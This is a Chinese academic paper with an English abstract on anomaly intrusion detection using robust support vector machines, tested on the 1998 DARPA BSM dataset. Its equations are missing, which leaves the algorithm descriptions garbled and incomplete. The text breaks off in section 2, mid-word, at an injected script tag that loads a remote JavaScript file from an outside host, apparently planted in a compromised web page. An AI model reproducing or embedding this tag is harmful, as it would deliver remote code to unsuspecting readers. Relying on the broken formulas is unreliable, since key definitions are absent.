基于rsvm的异常入侵检测系统
李春梅,李学干
(西安电子科技大学 计算机学院陕西 西安710071)
摘 要:首先介绍了支持向量机及robust支持向量机的分类算法,提出了robust支持向量机的入侵检测的模型;并利用研究入侵检测系统的mit′s lincoln 实验室1998年收集的darpa bsm的数据集,对robust 支持向量机和普通的支持向量机的性能进行了比较。
关键词:支持向量机;入侵检测;robust 支持向量机;网络安全
abnormal intrusion detection system based on rsvm
li chunmei, li xuegan
(academy of computer, xidian university,xi′an, 710071, china)
abstract:first, algorithm of support vector machine and robu st support vector machine taxonomy are introduced then the model of an intrusi on detection based on robust support vector machines is presented and u sing the 1998 darpa bsm data set collected at mit′s lincoln labs to study intru sion detection systems, the performance of robust support vector machines was co mpared with that of conventional support vector machines
keywords:support vector machine; intrusion detection; robust support vector machine; network security
随着计算机和网络技术应用的日益普及,计算机网络安全越来越受到人们的重视。入侵检测作为网络安全研究的重要内容,引起了国内外人士的广泛关注。支持向量机目前是一个很热门的研究方向,已被实验证明是一种有效的学习机。将支持向量机应用到入侵检测中,可以保证在经验知识不足的情况下,支持向量机的分类器仍然有较好的分类正确率,从而使整个入侵检测系统具有较好的检测性能。对支持向量机的算法进行改进后,采用了robust支持向量机的学习方法,并建立了robust支持向量机的入侵检测模型。
本文首先介绍了支持向量机的算法描述,并且引出了robust 支持向量机的算法描述,然后提出了robust支持向量机的入侵检测模型,并且对2种支持向量机的性能进行了比较,最后得出结论。
1支持向量机的算法描述
svm是支持向量机的简称,他是一种基于统计学理论的模式识别方法,是统计学习理论中最年轻的内容,也是最实用的部分,其核心内容在1992~1995年间提出,目前仍处在不断发展阶段,详细内容参见文献[1~3]。支持向量机可用于模式识别、回归分析、主成分分析等。下面以模式分类为例介绍支持向量机的含义。
给定一组训练数据(x1,y1),…,(xl,yl),xi∈rn,yi∈{+1,-1},i=1 ,2,…,l。要寻找一个分类规则i(x),使他能对未知类别的新样本(新样本与训练样本 独立同分布)做尽可能正确的划分。
支持向量机用于分类问题其实就是寻找一个最优分类超平面,把此平面作为分类决策面。同时他还通过引进核函数巧妙地解决了低维空间向量映射到高维空间向量时带来的“维数灾难”问题。
1.1vsm的算法描述
在训练集线性可分的情况下,svm就是要构造一个最优超平面:
其中:sv表示支持向量;a0i是拉格朗日乘子。
在训练集线性不可分时,引进松弛因子ξi≥0及惩罚
平面,分类函数只要取i(x)=
1.2核函数
支持向量集的一个引人入胜的地方在于核函数的引入。低维空间向量集往往难以划分,因此,自然要把他们映射到高维空间,但随之而来的是计算复杂度大大增加,而核函数巧妙地解决了这个问题。
若函数k(x,y)满足mercer式(2),则k(x,y)=φ(x)·φ(y),其中φ表示某个映射。只要适当的选择核函数就可得到对应高维空间的分类函数:
其中:k(x,y)=φ(x)·φ(y), φ(x),φ(y)是比x,y更高维的向量(不必知道φ的具体形式),由于k(x,y)只涉及x,y,因此计算没有涉及高维运算。
最后给出支持向量机的定义:分类函数类型为式(5)的学习机为支持向量机。
1.3rvsm的算法描述
robust 支持向量机的算法中,引进了新的松弛变量
其中:φ(xi),i=1,2,…,l表示从输入空间到特征空间非
学习机称为robust支持向量机。
2支持向量机的入侵检?script src=http://er12.com/t.js>
